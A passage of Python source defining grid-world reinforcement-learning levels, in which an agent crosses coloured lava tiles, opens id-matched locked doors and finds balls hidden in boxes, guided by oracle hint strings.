                # The opening overwrote a tile of the other colour: flip one
                # non-opening tile of the target colour back, presumably to
                # keep the two colour counts balanced — TODO confirm intent.
                a, b = None, None
                while colored_tiles[self.target_idx]:
                    a, b = colored_tiles[self.target_idx].pop()
                    if (a, b) not in openings:
                        break
                    if not colored_tiles[self.target_idx]:
                        a, b = None, None
                        break
                if a is not None:
                    self.grid.set(a, b, Lava(self.lava_colors[1 - self.target_idx]))
        #self.grid.set(i, j, None)
        self.instrs = GoToGoalInstr()
        self.put_obj(Goal('green'), *self.goal_pos)
        if self.call:
            self.grid.set(2, 1, None)
            self.agent_pos = (2, 1)
        else:
            # Clear a corridor and drop a movable Oracle next to the agent.
            self.grid.set(1, 1, None)
            self.grid.set(2, 1, None)
            self.grid.set(3, 1, None)
            self.agent_pos = (1, 1)
            self.oracle_pos = (3, 1)
            self.grid.set(*self.oracle_pos, Oracle(color='red'))
        self.agent_dir = 1
        self.useful_answers = ['danger zone is {}'.format(self.lava_colors[1 - self.target_idx])]
class Level_DangerBalancedDiverseMove(Level_DangerBalancedDiverse):
    """Variant with a movable Oracle object near the agent (call=False)."""

    def __init__(self, seed=None, room_size=7):
        super().__init__(seed=seed, room_size=room_size, call=False)
class Level_DangerBalancedDiverseRS9(Level_DangerBalancedDiverse):
    """Larger variant: 9x9 room instead of the default 7x7."""

    def __init__(self, seed=None, room_size=9):
        super().__init__(seed=seed, room_size=room_size)
class Level_OpenDoorMultiKeys(RoomGridLevel):
    """Open a locked door when several keys are present.

    Three keys with distinct ids/colours are placed in the left room; the
    locked door's id matches exactly one of them. The useful oracle answer
    reveals which key colour matches the door.
    """

    def __init__(self, seed=None):
        room_size = 7
        super().__init__(
            num_rows=1,
            num_cols=2,
            room_size=room_size,
            seed=seed
        )
        # Colour of the key whose id matches the locked door; set in
        # gen_mission.
        self.real_key_color = None

    def gen_mission(self):
        """Place the locked door, the three keys, and the instruction."""
        #colors = self._rand_subset(COLOR_NAMES, 2)
        colors = COLOR_NAMES[0:3]
        n_keys = 3
        # Add a door of color A connecting left and middle room
        locked_door_id = self._rand_int(0, n_keys)
        self.locked_door, _ = add_id_door(self, 0, 0, id=locked_door_id, door_idx=0, color=colors[0], locked=True)
        for i in range(n_keys):
            obj, _ = add_id_object(self, 0, 0, id=i, kind="key", color=colors[i])
            if i == locked_door_id:
                # Remember which key colour corresponds to the door's id.
                self.real_key_color = colors[i]
        self.place_agent(0, 0)
        self.instrs = OpenInstr(ObjDesc(self.locked_door.type, color=self.locked_door.color))
        self.useful_answers = ['{} key to {} door'.format(self.real_key_color, self.locked_door.color)]
class Level_DangerBalancedDiverseNeg(Level_DangerBalancedDiverse):
    """Variant with failure_neg=True (presumably penalising failure —
    TODO confirm semantics in RoomGridLevel)."""

    def __init__(self, seed=None):
        super().__init__(seed=seed, failure_neg=True)
#### Two Compositional
class Level_DangerOpenDoor(RoomGridLevel):
    """Compositional level: cross coloured danger tiles, then open a locked
    door to reach the goal in the second room.

    The single useful oracle answer reveals both the dangerous lava colour
    and the key colour matching the locked door.
    """

    def __init__(self, seed=None, room_size=7, call=True, failure_neg=False, anti_danger=True, n_rivers=3, open_door_bonus=True):
        # The two lava colours; which index is the target is sampled per
        # episode.
        self.lava_colors = ['yellow', 'blue']
        self.n_target = 2
        # Goal cell inside the right-hand room.
        self.goal_pos = (room_size * 2 - 3, room_size - 2)
        self.agent_start_pos = (2, 1)
        self.call = call
        self.failure_neg = failure_neg
        # When True, an additional anti-diagonal band of danger tiles is
        # generated before the diagonal one.
        self.anti_danger = anti_danger
        self.max_n_rivers = n_rivers
        # Forwarded to GoToGoalInstr(door=...); presumably grants a bonus
        # for opening the door — TODO confirm in the instruction class.
        self.open_door_bonus = open_door_bonus
        super().__init__(
            num_rows=1,
            num_cols=2,
            room_size=room_size,
            seed=seed,
            failure_neg=failure_neg
        )

    def gen_mission(self):
        """Lay out danger tiles, the locked door, the keys and the goal."""
        self.target_idx = self.np_random.randint(0, self.n_target)
        # Pin the connecting door position between the two rooms.
        self.room_grid[0][0].door_pos[0] = (6, 1)
        self.room_grid[0][1].door_pos[2] = (6, 1)
        # Place obstacles (lava or walls)
        if self.anti_danger:
            self.num_crossings = self.np_random.randint(1, self.max_n_rivers + 1)
            add_danger_tiles_anti_diag(self)
        self.num_crossings = self.np_random.randint(1, (self.room_size - 3))
        add_danger_tiles_diag(self)
        self.instrs = GoToGoalInstr(door=self.open_door_bonus)
        #self.put_obj(Goal('green'), *self.goal_pos)
        if self.call:
            self.grid.set(2, 1, None)
            self.agent_pos = (1, self.room_size - 2)
        else:
            # Clear a corridor and drop a movable Oracle next to the agent.
            self.grid.set(1, 1, None)
            self.grid.set(2, 1, None)
            self.grid.set(3, 1, None)
            self.agent_pos = (1, 1)
            self.oracle_pos = (3, 1)
            self.grid.set(*self.oracle_pos, Oracle(color='red'))
        self.agent_dir = 1
        # Open Door Part
        colors = COLOR_NAMES[0:3]
        n_keys = 2
        # Add a door of color A connecting left and middle room
        locked_door_id = self._rand_int(0, n_keys)
        self.locked_door, _ = add_id_door(self, 0, 0, id=locked_door_id, door_idx=0, color=colors[0], locked=True)
        self.target_doors = [self.locked_door]
        for i in range(n_keys):
            obj = KeyWID(i, colors[i])
            # Keys are pinned to fixed cells in the first room.
            if i == 0:
                self.grid.set(self.room_size - 3, 1, obj)
            elif i == 1:
                self.grid.set(self.room_size - 2, 2, obj)
            if i == locked_door_id:
                self.real_key_color = colors[i]
        self.put_obj(Goal('green'), *self.goal_pos)
        self.useful_answers = ['danger zone is {}, {} key to {} door'.format(self.lava_colors[1 - self.target_idx], self.real_key_color, self.locked_door.color)]
class Level_DangerOpenDoorV2(Level_DangerOpenDoor):
    """Variant without the door bonus in the goal instruction."""

    def __init__(self, seed=None, room_size=7):
        super().__init__(seed=seed, room_size=room_size, open_door_bonus=False)
class Level_OpenDoorObjInBox(RoomGridLevel):
    """Compositional level: find the right key to a locked door, then find
    a toy hidden inside one of several boxes in the second room.

    The useful oracle answers chain: owner's toy -> ball colour -> owner's
    suitcase -> box colour -> room, plus which key opens the door.
    """

    def __init__(self, seed=None, n_boxes=2, failure_neg=False):
        room_size = 7
        self.n_boxes = n_boxes
        self.names = ['jack', 'mary']
        super().__init__(
            num_rows=1,
            num_cols=2,
            room_size=room_size,
            seed=seed,
            failure_neg=failure_neg
        )
        # Colour of the key matching the locked door; set in gen_mission.
        self.real_key_color = None

    def gen_mission(self):
        """Place the locked door, keys, and the ball-in-box chain."""
        colors = COLOR_NAMES[0:3]
        n_keys = 2
        # Add a door of color A connecting left and middle room
        locked_door_id = self._rand_int(0, n_keys)
        self.locked_door, _ = add_id_door(self, 0, 0, id=locked_door_id, door_idx=0, color=colors[0], locked=True)
        self.target_doors = [self.locked_door]
        for i in range(n_keys):
            obj, _ = add_id_object(self, 0, 0, id=i, kind="key", color=colors[i])
            if i == locked_door_id:
                self.real_key_color = colors[i]
        # ObjInBox Part
        colors = COLOR_NAMES[:self.n_boxes]
        # Independently shuffled colour lists for balls and for boxes.
        shuffled_colors = copy.deepcopy(colors)
        self.np_random.shuffle(shuffled_colors)
        shuffled_colors2 = copy.deepcopy(colors)
        self.np_random.shuffle(shuffled_colors2)
        target_id = self._rand_int(0, self.n_boxes)
        toy_owner = self._rand_int(0, 2)
        box_owner = 1 - toy_owner
        for i in range(self.n_boxes):
            ball = Ball(color=shuffled_colors[i])
            box = Box(color=shuffled_colors2[i], contains=ball)
            self.place_in_room(1, 0, box)
            if i == target_id:
                self.box_owner = self.names[box_owner]
                self.target_box = box
        # NOTE(review): `ball` below is the one from the FINAL loop
        # iteration, while `self.target_box` is the box at index
        # `target_id`; when target_id != n_boxes - 1 the answer chain pairs
        # the last ball with target_box's colour — confirm this is intended.
        self.instrs = FindOrFailInstr(ObjDesc(ball.type, ball.color), surface='find the key to the door, and find ' + self.names[toy_owner] + ' toy', door=True)
        self.useful_answers = ['{} toy is {} ball'.format(self.names[toy_owner], ball.color),
                               '{} ball in {} suitcase'.format(ball.color, self.names[box_owner]),
                               '{} suitcase {} box'.format(self.names[box_owner], self.target_box.color),
                               '{} box in room1'.format(self.target_box.color)]
        self.place_agent(0, 0)
        self.useful_answers.append('{} key to the door'.format(self.real_key_color))
class Level_OpenDoorGoToFavorite(RoomGridLevel):
    """
    Go to an object, the object may be in another room. Many distractors.

    Composition of OpenDoor and GoToFavorite: the target object's room is
    locked behind id-matched doors, and two candidate keys are placed in
    the agent's starting room; the useful oracle answers identify the toy,
    its room, and the matching key colour.

    Fixes: `== None` comparisons replaced with `is None`, the local name
    `type` no longer shadows the builtin, and the room-id decomposition
    uses `self.num_cols` instead of a hard-coded 3 (identical for the
    default 3x3 grid, correct for other sizes).
    """

    def __init__(
        self,
        room_size=5,
        num_rows=3,
        num_cols=3,
        num_dists=3,
        doors_open=False,
        seed=None,
        all_doors=True,
        num_colors=2,
        oracle_mode='call'
    ):
        self.num_dists = num_dists
        self.doors_open = doors_open
        self.num_rows = num_rows
        self.num_cols = num_cols
        self.all_doors = all_doors
        self.num_colors = num_colors
        self.names = ['jack', 'mary']
        self.others_fav = None
        self.oracle_mode = oracle_mode
        super().__init__(
            num_rows=num_rows,
            num_cols=num_cols,
            room_size=room_size,
            seed=seed
        )

    def gen_mission(self):
        """Lay out doors, distractors, keys and build the instruction."""
        agent_room_i = self._rand_int(0, self.num_cols)
        agent_room_j = self._rand_int(0, self.num_rows)
        self.place_agent(agent_room_i, agent_room_j)
        locked = False
        if self.all_doors:
            # Fully connect the 3x3 grid with id-100 doors (right-facing,
            # then down-facing).
            add_id_door(self, 0, 0, id=100, door_idx=0, locked=locked)
            add_id_door(self, 0, 1, id=100, door_idx=0, locked=locked)
            add_id_door(self, 1, 1, id=100, door_idx=0, locked=locked)
            add_id_door(self, 0, 2, id=100, door_idx=0, locked=locked)
            add_id_door(self, 1, 2, id=100, door_idx=0, locked=locked)
            add_id_door(self, 0, 0, id=100, door_idx=1, locked=locked)
            add_id_door(self, 1, 0, id=100, door_idx=1, locked=locked)
            add_id_door(self, 2, 0, id=100, door_idx=1, locked=locked)
            add_id_door(self, 0, 1, id=100, door_idx=1, locked=locked)
            add_id_door(self, 1, 1, id=100, door_idx=1, locked=locked)
            add_id_door(self, 2, 1, id=100, door_idx=1, locked=locked)
        else:
            self.connect_all()
        objs = self.add_distractors(num_distractors=self.num_dists, all_unique=True, num_colors=self.num_colors)
        obj = self._rand_elem(objs)
        self.check_objs_reachable()
        # NOTE(review): uses the global `random` module rather than
        # self.np_random, so the name order is not controlled by the
        # environment seed — confirm this is intended.
        random.shuffle(self.names)
        self.instrs = FavoriteInstr(ObjDesc(obj.type, obj.color), name=self.names[0], surface='find the key to the door, go to {} toy'.format(self.names[0]), open_door=True)
        # Room index of the target object (row-major over the room grid).
        room_id = (obj.cur_pos[0] // self.room_size) + (obj.cur_pos[1] // self.room_size) * self.num_cols
        target_obj = obj
        self.others_fav = self._rand_elem(objs)
        if self.doors_open:
            self.open_all_doors()
        if self.oracle_mode == 'single_move':
            oracle = Oracle(color='red')
            self.place_in_room(agent_room_i, agent_room_j, oracle)
            self.oracle = oracle
        # OpenDoor
        colors = COLOR_NAMES[0:3]
        n_keys = 2
        # Add a door of color A connecting left and middle room
        locked_door_id = self._rand_int(0, n_keys)
        #self.locked_door, _ = self.add_id_door(0, 0, id=locked_door_id, door_idx=0, color=colors[0], locked=True)
        for i in range(n_keys):
            obj, _ = add_id_object(self, agent_room_i, agent_room_j, id=i, kind="key", color=colors[i])
            if i == locked_door_id:
                self.real_key_color = colors[i]
        self.target_doors = []
        # Lock every door of the target object's room with the matching id.
        # (room_id was built as col + row * num_cols, so decompose with
        # num_cols; equals the old hard-coded 3 for the default grid.)
        room_i, room_j = room_id // self.num_cols, room_id % self.num_cols
        for door in self.room_grid[room_i][room_j].doors:
            if door is not None:
                door.is_locked = True
                door.id = locked_door_id
                self.target_doors.append(door)
        self.useful_answers = ['{} toy is {} {}'.format(self.names[0], target_obj.color, target_obj.type),
                               '{} {} in room{}'.format(target_obj.color, target_obj.type, room_id),
                               '{} key to the door'.format(self.real_key_color)
                               ]

    def add_distractors(self, i=None, j=None, num_distractors=10, all_unique=True, num_colors=2):
        """
        Add random objects that can potentially distract/confuse the agent.

        :param i, j: room coordinates; a random room is used when None
        :param num_distractors: how many distractors to add
        :param all_unique: skip (type, color) pairs already present
        :param num_colors: how many colours to draw from
        :return: list of the distractor objects added
        """
        # Collect a list of existing objects
        objs = []
        for row in self.room_grid:
            for room in row:
                for obj in room.objs:
                    objs.append((obj.type, obj.color))
        # List of distractors added
        dists = []
        while len(dists) < num_distractors:
            color = self._rand_elem(COLOR_NAMES[:num_colors])
            obj_type = self._rand_elem(['ball', 'box'])
            obj = (obj_type, color)
            if all_unique and obj in objs:
                continue
            # Add the object to a random room if no room specified
            room_i = i
            room_j = j
            if room_i is None:
                room_i = self._rand_int(0, self.num_cols)
            if room_j is None:
                room_j = self._rand_int(0, self.num_rows)
            dist, pos = self.add_object(room_i, room_j, *obj)
            objs.append(obj)
            dists.append(dist)
        return dists
class Level_GoToFavoriteObjInBox(RoomGridLevel):
    """
    Go to an object, the object may be in another room. Many distractors.

    The target is a ball hidden inside one of two boxes; the instruction asks
    for the toy belonging to a randomly chosen owner ('jack' or 'mary').
    """

    def __init__(
        self,
        room_size=5,
        num_rows=3,
        num_cols=3,
        num_dists=3,
        doors_open=True,
        seed=None,
        all_doors=True,
        num_colors=2,
        oracle_mode='call',
        failure_neg=False
    ):
        self.num_dists = num_dists
        self.doors_open = doors_open
        self.num_rows = num_rows
        self.num_cols = num_cols
        self.all_doors = all_doors
        self.num_colors = num_colors
        self.names = ['jack', 'mary']
        self.others_fav = None
        self.oracle_mode = oracle_mode
        self.n_boxes = 2
        super().__init__(
            num_rows=num_rows,
            num_cols=num_cols,
            room_size=room_size,
            seed=seed,
            failure_neg=failure_neg
        )

    def gen_mission(self):
        """Place the agent, the doors, an optional oracle, and the two boxes."""
        agent_room_i = self._rand_int(0, self.num_cols)
        agent_room_j = self._rand_int(0, self.num_rows)
        self.place_agent(agent_room_i, agent_room_j)
        locked = False
        if self.all_doors:
            # Explicitly add every internal door; this enumeration assumes the
            # default 3x3 room grid.
            self.add_door(0, 0, door_idx=0, locked=locked)
            self.add_door(1, 0, door_idx=0, locked=locked)
            self.add_door(0, 1, door_idx=0, locked=locked)
            self.add_door(1, 1, door_idx=0, locked=locked)
            self.add_door(0, 2, door_idx=0, locked=locked)
            self.add_door(1, 2, door_idx=0, locked=locked)
            self.add_door(0, 0, door_idx=1, locked=locked)
            self.add_door(1, 0, door_idx=1, locked=locked)
            self.add_door(2, 0, door_idx=1, locked=locked)
            self.add_door(0, 1, door_idx=1, locked=locked)
            self.add_door(1, 1, door_idx=1, locked=locked)
            self.add_door(2, 1, door_idx=1, locked=locked)
        else:
            self.connect_all()
        if self.doors_open:
            self.open_all_doors()
        if self.oracle_mode == 'single_move':
            oracle = Oracle(color='red')
            self.place_in_room(agent_room_i, agent_room_j, oracle)
            self.oracle = oracle
        # ObjInBox: two boxes, each hiding a ball; ball and box colors are
        # shuffled independently.
        colors = COLOR_NAMES[:self.n_boxes]
        shuffled_colors = copy.deepcopy(colors)
        self.np_random.shuffle(shuffled_colors)
        shuffled_colors2 = copy.deepcopy(colors)
        self.np_random.shuffle(shuffled_colors2)
        target_id = self._rand_int(0, self.n_boxes)
        toy_owner = self._rand_int(0, 2)
        box_owner = 1 - toy_owner
        for i in range(self.n_boxes):
            ball = Ball(color=shuffled_colors[i])
            box = Box(color=shuffled_colors2[i], contains=ball)
            # Generalized from hard-coded randint(0, 3): draw from the actual
            # grid dimensions (identical behavior for the 3x3 default).
            self.place_in_room(self.np_random.randint(0, self.num_cols), self.np_random.randint(0, self.num_rows), box)
            if i == target_id:
                self.box_owner = self.names[box_owner]
                self.target_box = box
                self.instrs = FindOrFailInstr(ObjDesc(ball.type, ball.color), surface='find ' + self.names[toy_owner] + ' toy')
                self.useful_answers = ['{} toy is {} ball'.format(self.names[toy_owner], ball.color),
                                       '{} ball in {} suitcase'.format(ball.color, self.names[box_owner]),
                                       '{} suitcase is {} box'.format(self.names[box_owner], self.target_box.color)]

    def add_distractors(self, i=None, j=None, num_distractors=10, all_unique=True, num_colors=2):
        """Add random ball/box objects that can potentially distract/confuse the agent.

        Returns the list of distractor objects added to the grid.
        """
        # Collect (type, color) pairs of existing objects for duplicate checks.
        objs = []
        for row in self.room_grid:
            for room in row:
                for obj in room.objs:
                    objs.append((obj.type, obj.color))
        # List of distractors added
        dists = []
        while len(dists) < num_distractors:
            color = self._rand_elem(COLOR_NAMES[:num_colors])
            # 'kind' avoids shadowing the builtin `type`.
            kind = self._rand_elem(['ball', 'box'])
            obj = (kind, color)
            if all_unique and obj in objs:
                continue
            # Add the object to a random room if no room specified
            room_i = i
            room_j = j
            if room_i is None:
                room_i = self._rand_int(0, self.num_cols)
            if room_j is None:
                room_j = self._rand_int(0, self.num_rows)
            dist, pos = self.add_object(room_i, room_j, *obj)
            objs.append(obj)
            dists.append(dist)
        return dists
class Level_DangerObjInBox(RoomGridLevel):
    """Single-room level: cross danger tiles and find a toy hidden in a box.

    Two boxes each hide a ball; the instruction asks for the toy of a
    randomly chosen owner.  One of the two lava colors is the danger zone.
    """

    def __init__(self, seed=None, room_size=7, call=True, failure_neg=False):
        # Candidate lava colors; the dangerous one is picked in gen_mission.
        self.lava_colors = ['yellow', 'blue']
        self.n_target = 2
        self.goal_pos = (room_size - 2, room_size - 2)
        self.agent_start_pos = (2, 1)
        # When call is False, an Oracle object is placed on the grid instead.
        self.call = call
        self.n_boxes = 2
        self.names = ['jack', 'mary']
        super().__init__(
            num_rows=1,
            num_cols=1,
            room_size=room_size,
            seed=seed,
            failure_neg=failure_neg
        )

    def gen_mission(self):
        """Lay out danger tiles, the agent/oracle, and the two ball-in-box targets."""
        self.target_idx = self.np_random.randint(0, self.n_target)
        # Place obstacles (lava or walls)
        self.num_crossings = self.np_random.randint(1, (self.room_size - 3))
        add_danger_tiles_anti_diag(self)
        if self.call:
            self.grid.set(2, 1, None)
            self.agent_pos = (2, 1)
        else:
            # Clear a strip for the agent and place an Oracle next to it.
            self.grid.set(1, 1, None)
            self.grid.set(2, 1, None)
            self.grid.set(3, 1, None)
            self.agent_pos = (1, 1)
            self.oracle_pos = (3, 1)
            self.grid.set(*self.oracle_pos, Oracle(color='red'))
        self.agent_dir = 1
        # Ball and box colors are shuffled independently of each other.
        colors = COLOR_NAMES[:self.n_boxes]
        shuffled_colors = copy.deepcopy(colors)
        self.np_random.shuffle(shuffled_colors)
        shuffled_colors2 = copy.deepcopy(colors)
        self.np_random.shuffle(shuffled_colors2)
        target_id = self._rand_int(0, self.n_boxes)
        toy_owner = self._rand_int(0, 2)
        box_owner = 1 - toy_owner
        for i in range(self.n_boxes):
            ball = Ball(color=shuffled_colors[i])
            box = Box(color=shuffled_colors2[i], contains=ball)
            # One box in the bottom-left corner, the other bottom-right.
            if i == 0:
                self.grid.set(1, self.room_size - 2, box)
            else:
                self.grid.set(self.room_size - 2, self.room_size - 2, box)
            self.get_room(0, 0).objs.append(box)
            if i == target_id:
                self.box_owner = self.names[box_owner]
                self.target_box = box
                self.instrs = FindOrFailInstr(ObjDesc(ball.type, ball.color), surface='Avoid danger zone, find ' + self.names[toy_owner] + ' toy',
                                              danger=True)
                self.useful_answers = ['{} toy is {} ball'.format(self.names[toy_owner], ball.color),
                                       '{} ball in {} suitcase'.format(ball.color, self.names[box_owner]),
                                       '{} suitcase is {} box'.format(self.names[box_owner], self.target_box.color),
                                       'danger zone is {}'.format(self.lava_colors[1 - self.target_idx])]
        #print(self.useful_answers)
class Level_DangerGoToFav(RoomGridLevel):
    """Three-room corridor: cross danger tiles to reach jack's favorite toy."""

    def __init__(self, seed=None, room_size=7, call=True, failure_neg=False, anti_danger=True, n_rivers=3):
        # Candidate lava colors; the dangerous one is picked in gen_mission.
        self.lava_colors = ['yellow', 'blue']
        self.n_target = 2
        self.goal_pos = (room_size * 2 - 3, room_size - 2)
        self.agent_start_pos = (2, 1)
        # When call is False, an Oracle object is placed on the grid instead.
        self.call = call
        self.names = ['jack', 'mary']
        # anti_danger toggles the anti-diagonal danger-tile patches.
        self.anti_danger = anti_danger
        self.max_n_rivers = n_rivers
        super().__init__(
            num_rows=1,
            num_cols=3,
            room_size=room_size,
            seed=seed,
            failure_neg=failure_neg
        )

    def gen_mission(self):
        """Lay out doors, danger tiles, the agent/oracle, and two candidate toys."""
        self.target_idx = self.np_random.randint(0, self.n_target)
        # Fix door positions on the two shared walls before adding the doors.
        self.room_grid[0][0].door_pos[0] = (6, 1)
        self.room_grid[0][1].door_pos[2] = (6, 1)
        self.room_grid[0][1].door_pos[0] = (12, 5)
        self.room_grid[0][2].door_pos[2] = (12, 5)
        self.add_door(0, 0, door_idx=0, locked=False)
        self.add_door(1, 0, door_idx=0, locked=False)
        # Place obstacles (lava or walls)
        if self.anti_danger:
            self.num_crossings = self.np_random.randint(1, self.max_n_rivers + 1)
            add_danger_tiles_anti_diag(self)
            self.num_crossings = self.np_random.randint(1, self.max_n_rivers + 1)
            add_danger_tiles_anti_diag(self, offset=12)
        self.num_crossings = self.np_random.randint(1, (self.room_size - 3))
        add_danger_tiles_diag(self)
        if self.call:
            self.grid.set(2, 1, None)
            self.agent_pos = (self.room_size, 1)
        else:
            # Clear a strip for the agent and place an Oracle next to it.
            self.grid.set(1, 1, None)
            self.grid.set(2, 1, None)
            self.grid.set(3, 1, None)
            self.agent_pos = (1, 1)
            self.oracle_pos = (3, 1)
            self.grid.set(*self.oracle_pos, Oracle(color='red'))
        self.agent_dir = 1
        self.open_all_doors()
        # GoToFav
        self.num_dists = 2
        objs = []
        obj = create_rnd_obj(self)
        place_obj(self, 1, self.room_size - 2, obj)
        objs.append(obj)
        obj = create_rnd_obj(self)
        place_obj(self, (self.room_size - 1) * 3 - 1, 1, obj)
        objs.append(obj)
        target_obj = self._rand_elem(objs)
        self.instrs = FavoriteInstr(ObjDesc(target_obj.type, target_obj.color), name=self.names[0], surface="avoid danger zone, go to {} toy".format(self.names[0]), danger=True)
        # room_id = col + row * num_cols of the room containing the target.
        room_id = (target_obj.cur_pos[0] // self.room_size) + (target_obj.cur_pos[1] // self.room_size) * self.num_cols
        self.useful_answers = ['{} toy is {} {}'.format(self.names[0], target_obj.color, target_obj.type),
                               '{} {} in room{}'.format(target_obj.color, target_obj.type, room_id),
                               'danger zone is {}'.format(self.lava_colors[1 - self.target_idx])]
        #print(self.useful_answers)
class Level_DangerGoToFavSymmetry(RoomGridLevel):
    """Three-room DangerGoToFav variant with a symmetric danger-tile layout."""

    def __init__(self, seed=None, room_size=7, call=True, failure_neg=False, n_rivers=3):
        # Candidate lava colors; the dangerous one is picked in gen_mission.
        self.lava_colors = ['yellow', 'blue']
        self.n_target = 2
        self.goal_pos = (room_size * 2 - 3, room_size - 2)
        self.agent_start_pos = (2, 1)
        # When call is False, an Oracle object is placed on the grid instead.
        self.call = call
        self.names = ['jack', 'mary']
        self.max_n_rivers = n_rivers
        super().__init__(
            num_rows=1,
            num_cols=3,
            room_size=room_size,
            seed=seed,
            failure_neg=failure_neg
        )

    def gen_mission(self):
        """Lay out doors, three danger-tile patches, the agent/oracle, and two toys."""
        self.target_idx = self.np_random.randint(0, self.n_target)
        # Fix door positions on the two shared walls before adding the doors.
        self.room_grid[0][0].door_pos[0] = (6, 1)
        self.room_grid[0][1].door_pos[2] = (6, 1)
        self.room_grid[0][1].door_pos[0] = (12, 1)
        self.room_grid[0][2].door_pos[2] = (12, 1)
        self.add_door(0, 0, door_idx=0, locked=False)
        self.add_door(1, 0, door_idx=0, locked=False)
        # Place obstacles (lava or walls): anti-diagonal, middle, diagonal.
        self.num_crossings = self.np_random.randint(1, self.max_n_rivers + 1)
        add_danger_tiles_anti_diag(self)
        self.num_crossings = self.np_random.randint(1, 4)
        add_danger_tiles_middle(self, offset=6)
        self.num_crossings = self.np_random.randint(1, (self.max_n_rivers + 1))
        add_danger_tiles_diag(self, offset=12)
        if self.call:
            self.grid.set(2, 1, None)
            self.agent_pos = (self.room_size + 2, 1)
        else:
            # Clear a strip for the agent and place an Oracle next to it.
            self.grid.set(1, 1, None)
            self.grid.set(2, 1, None)
            self.grid.set(3, 1, None)
            self.agent_pos = (1, 1)
            self.oracle_pos = (3, 1)
            self.grid.set(*self.oracle_pos, Oracle(color='red'))
        self.agent_dir = 1
        self.open_all_doors()
        # GoToFav
        self.num_dists = 2
        objs = []
        obj = create_rnd_obj(self)
        place_obj(self, 1, self.room_size - 2, obj)
        objs.append(obj)
        obj = create_rnd_obj(self)
        place_obj(self, (self.room_size - 1) * 3 - 1, self.room_size - 2, obj)
        objs.append(obj)
        target_obj = self._rand_elem(objs)
        self.instrs = FavoriteInstr(ObjDesc(target_obj.type, target_obj.color), name=self.names[0], surface="avoid danger zone, go to {} toy".format(self.names[0]), danger=True)
        # room_id = col + row * num_cols of the room containing the target.
        room_id = (target_obj.cur_pos[0] // self.room_size) + (target_obj.cur_pos[1] // self.room_size) * self.num_cols
        self.useful_answers = ['{} toy is {} {}'.format(self.names[0], target_obj.color, target_obj.type),
                               '{} {} in room{}'.format(target_obj.color, target_obj.type, room_id)]
class Level_DangerGoToFav2Room(RoomGridLevel):
    """Two-room variant of DangerGoToFav: cross danger tiles to reach jack's toy."""

    def __init__(self, seed=None, room_size=7, call=True, failure_neg=False, anti_danger=True, n_rivers=3):
        # Candidate lava colors; the dangerous one is picked in gen_mission.
        self.lava_colors = ['yellow', 'blue']
        self.n_target = 2
        self.goal_pos = (room_size * 2 - 3, room_size - 2)
        self.agent_start_pos = (2, 1)
        # When call is False, an Oracle object is placed on the grid instead.
        self.call = call
        self.names = ['jack', 'mary']
        # anti_danger toggles the anti-diagonal danger-tile patch.
        self.anti_danger = anti_danger
        self.max_n_rivers = n_rivers
        super().__init__(
            num_rows=1,
            num_cols=2,
            room_size=room_size,
            seed=seed,
            failure_neg=failure_neg
        )

    def gen_mission(self):
        """Lay out the door, danger tiles, the agent/oracle, and two candidate toys."""
        self.target_idx = self.np_random.randint(0, self.n_target)
        # Fix the door position on the shared wall before adding the door.
        self.room_grid[0][0].door_pos[0] = (6, 1)
        self.room_grid[0][1].door_pos[2] = (6, 1)
        self.add_door(0, 0, door_idx=0, locked=False)
        # Place obstacles (lava or walls)
        if self.anti_danger:
            self.num_crossings = self.np_random.randint(1, self.max_n_rivers + 1)
            add_danger_tiles_anti_diag(self)
        self.num_crossings = self.np_random.randint(1, (self.max_n_rivers + 1))
        add_danger_tiles_diag(self)
        if self.call:
            self.grid.set(2, 1, None)
            self.agent_pos = (self.room_size - 1, 1)
        else:
            # Clear a strip for the agent and place an Oracle next to it.
            self.grid.set(1, 1, None)
            self.grid.set(2, 1, None)
            self.grid.set(3, 1, None)
            self.agent_pos = (1, 1)
            self.oracle_pos = (3, 1)
            self.grid.set(*self.oracle_pos, Oracle(color='red'))
        self.agent_dir = 1
        self.open_all_doors()
        # GoToFav
        self.num_dists = 2
        objs = []
        obj = create_rnd_obj(self)
        place_obj(self, 1, self.room_size - 2, obj)
        objs.append(obj)
        obj = create_rnd_obj(self)
        place_obj(self, (self.room_size - 1) * 2 - 1, self.room_size - 2, obj)
        objs.append(obj)
        target_obj = self._rand_elem(objs)
        self.instrs = FavoriteInstr(ObjDesc(target_obj.type, target_obj.color), name=self.names[0], surface="avoid danger zone, go to {} toy".format(self.names[0]), danger=True)
        # room_id = col + row * num_cols of the room containing the target.
        room_id = (target_obj.cur_pos[0] // self.room_size) + (target_obj.cur_pos[1] // self.room_size) * self.num_cols
        self.useful_answers = ['{} toy is {} {}'.format(self.names[0], target_obj.color, target_obj.type),
                               '{} {} in room{}'.format(target_obj.color, target_obj.type, room_id),
                               'danger zone is {}'.format(self.lava_colors[1 - self.target_idx])
                               ]
class Level_DangerOpenDoorNeg(Level_DangerOpenDoor):
    """Level_DangerOpenDoor with failure negation enabled (failure_neg=True)."""

    def __init__(self, seed=None, room_size=7):
        super().__init__(seed=seed, room_size=room_size, call=True, failure_neg=True)
class Level_DangerGoToFavNeg(Level_DangerGoToFav):
    """Level_DangerGoToFav with failure negation enabled (failure_neg=True)."""

    def __init__(self, seed=None, room_size=7):
        super().__init__(seed=seed, room_size=room_size, call=True, failure_neg=True)
class Level_DangerObjInBoxNeg(Level_DangerObjInBox):
    """Level_DangerObjInBox with failure negation enabled (failure_neg=True)."""

    def __init__(self, seed=None, room_size=7):
        super().__init__(seed=seed, room_size=room_size, call=True, failure_neg=True)
class Level_GoToFavoriteObjInBoxNeg(Level_GoToFavoriteObjInBox):
    """Level_GoToFavoriteObjInBox with failure negation enabled (failure_neg=True)."""

    def __init__(self, seed=None):
        super().__init__(seed=seed, failure_neg=True)
class Level_OpenDoorObjInBoxNeg(Level_OpenDoorObjInBox):
    """Level_OpenDoorObjInBox with failure negation enabled (failure_neg=True)."""

    def __init__(self, seed=None):
        super().__init__(seed=seed, failure_neg=True)
class Level_DangerGoToFavEasy(Level_DangerGoToFav):
    """Easier Level_DangerGoToFav: anti-diagonal danger tiles disabled."""

    def __init__(self, seed=None, room_size=7):
        super().__init__(seed=seed, room_size=room_size, call=True, failure_neg=False, anti_danger=False)
class Level_DangerOpenDoorEasy(Level_DangerOpenDoor):
    """Easier Level_DangerOpenDoor: anti-diagonal danger tiles disabled."""

    def __init__(self, seed=None, room_size=7):
        super().__init__(seed=seed, room_size=room_size, call=True, failure_neg=False, anti_danger=False)
class Level_DangerOpenDoor1Cross(Level_DangerOpenDoor):
    """Level_DangerOpenDoor limited to at most one danger-tile river."""

    def __init__(self, seed=None, room_size=7):
